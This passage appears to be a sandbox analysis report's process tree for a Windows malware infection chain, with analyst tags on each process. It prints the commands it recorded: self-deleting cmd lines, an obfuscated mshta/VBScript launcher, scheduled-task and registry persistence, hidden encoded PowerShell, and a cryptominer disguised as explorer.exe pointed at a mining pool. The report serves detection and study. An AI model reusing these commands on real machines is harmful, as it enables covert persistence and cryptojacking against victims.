C:\Users\Admin\Documents\On5CZGeWVdAdYS_NuT3GO10N.exe"C:\Users\Admin\Documents\On5CZGeWVdAdYS_NuT3GO10N.exe"11⤵PID:8916
-
-
C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"11⤵PID:2528
-
C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"12⤵PID:6868
-
-
-
C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"11⤵PID:8900
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 8900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"12⤵PID:4964
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 890013⤵
- Kills process with taskkill
PID:8728
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 8900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"12⤵PID:5976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 890013⤵
- Kills process with taskkill
PID:6536
-
-
-
-
C:\Users\Admin\Documents\zguUXhXtTEoTIsNXXhD5cR4n.exe"C:\Users\Admin\Documents\zguUXhXtTEoTIsNXXhD5cR4n.exe"11⤵PID:8892
-
-
C:\Users\Admin\Documents\bxgrUbWCtRx73_DWGjugj3hx.exe"C:\Users\Admin\Documents\bxgrUbWCtRx73_DWGjugj3hx.exe"11⤵PID:3628
-
-
C:\Users\Admin\Documents\MRhx7oeqEZQKIpUr4j_6_nZ_.exe"C:\Users\Admin\Documents\MRhx7oeqEZQKIpUr4j_6_nZ_.exe"11⤵PID:3420
-
-
C:\Users\Admin\Documents\hG_4GVL3QU953ONKKhYeY3VX.exe"C:\Users\Admin\Documents\hG_4GVL3QU953ONKKhYeY3VX.exe"11⤵PID:8884
-
-
C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"11⤵PID:5252
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:7288
-
-
-
C:\Users\Admin\Documents\FP04bfDJErfykDeufEoXOhiK.exe"C:\Users\Admin\Documents\FP04bfDJErfykDeufEoXOhiK.exe"11⤵PID:3468
-
-
C:\Users\Admin\Documents\03vomNZr6_EHqFzytm0NImkL.exe"C:\Users\Admin\Documents\03vomNZr6_EHqFzytm0NImkL.exe"11⤵PID:8880
-
-
C:\Users\Admin\Documents\Op2jatWs4CleqYx1VMoKKMCB.exe"C:\Users\Admin\Documents\Op2jatWs4CleqYx1VMoKKMCB.exe"11⤵PID:8868
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:4716
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:5552
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:9384
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J14⤵PID:10020
-
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Runs ping.exe
PID:9340
-
-
-
-
-
C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"11⤵PID:8860
-
C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"12⤵PID:3392
-
-
C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"12⤵PID:5596
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150d896340a863.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150d896340a863.exeSun150d896340a863.exe5⤵
- Executes dropped EXE
PID:3228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun150d896340a863.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150d896340a863.exe" & del C:\ProgramData\*.dll & exit6⤵PID:5252
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun150d896340a863.exe /f7⤵
- Kills process with taskkill
PID:4668
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:4712
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15d8dfe2c6d17.exeSun15d8dfe2c6d17.exe5⤵
- Executes dropped EXE
PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15223697c98.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15223697c98.exeSun15223697c98.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun157ff8e4440aa.exeSun157ff8e4440aa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:3980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3992
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1208
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:6116
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:6500
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:7144
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:7352
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:8492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4076 -
C:\ProgramData\3883238.exe"C:\ProgramData\3883238.exe"8⤵PID:3848
-
-
C:\ProgramData\1534734.exe"C:\ProgramData\1534734.exe"8⤵PID:4636
-
-
C:\ProgramData\526294.exe"C:\ProgramData\526294.exe"8⤵PID:5560
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4576 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4576 -s 15048⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8048⤵
- Program crash
PID:2764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8288⤵
- Program crash
PID:4692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8568⤵
- Program crash
PID:3468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8768⤵
- Program crash
PID:2376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 10128⤵
- Program crash
PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 10808⤵
- Program crash
PID:3340
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\is-T9QNE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-T9QNE.tmp\setup_2.tmp" /SL5="$10200,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\is-N467E.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-N467E.tmp\setup_2.tmp" /SL5="$501EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:648 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:416
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:4276
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵PID:3320
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:4240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "9⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe10⤵PID:6088
-
C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe11⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵PID:5408
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:5892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵PID:972
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:5136
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exeFoxyIDM621d.exe10⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵PID:5448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun1584240df9fe73a3.exeSun1584240df9fe73a3.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4228 -
C:\ProgramData\5047182.exe"C:\ProgramData\5047182.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\ProgramData\737992.exe"C:\ProgramData\737992.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3836 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:3292
-
-
-
C:\ProgramData\1271845.exe"C:\ProgramData\1271845.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3232 -
C:\ProgramData\1271845.exe"C:\ProgramData\1271845.exe"7⤵
- Executes dropped EXE
PID:3316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 8927⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
C:\ProgramData\1650891.exe"C:\ProgramData\1650891.exe"6⤵
- Executes dropped EXE
PID:3296
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150faeb3537d.exeSun150faeb3537d.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4008 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2220
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun157a449716c8ee483.exeSun157a449716c8ee483.exe /mixone5⤵
- Executes dropped EXE
PID:4248 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 6566⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 6726⤵
- Program crash
PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 6566⤵
- Program crash
PID:3952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 8886⤵
- Program crash
PID:5012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 9646⤵
- Program crash
PID:5736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 11006⤵
- Program crash
PID:5868
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4244 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1568
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6108 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe1⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵PID:6920
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4800
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6320
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6316
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 73D1DAF73BB8EE324B507C376053D8F1 C2⤵PID:4340
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D18D89221C112E70C38B2D6336A2D45C2⤵PID:7676
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8220
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6264
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2756 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5732
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8092
-
C:\Users\Admin\AppData\Local\Temp\F1B4.exeC:\Users\Admin\AppData\Local\Temp\F1B4.exe1⤵PID:8924
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe1⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵PID:9912
-
-
C:\Users\Admin\AppData\Local\Temp\4D71.exeC:\Users\Admin\AppData\Local\Temp\4D71.exe1⤵PID:8772
-
C:\Users\Admin\AppData\Local\Temp\7CB0.exeC:\Users\Admin\AppData\Local\Temp\7CB0.exe1⤵PID:10196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\System32\wow64cpu\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6620
-
C:\Users\Admin\AppData\Local\Temp\B40D.exeC:\Users\Admin\AppData\Local\Temp\B40D.exe1⤵PID:9092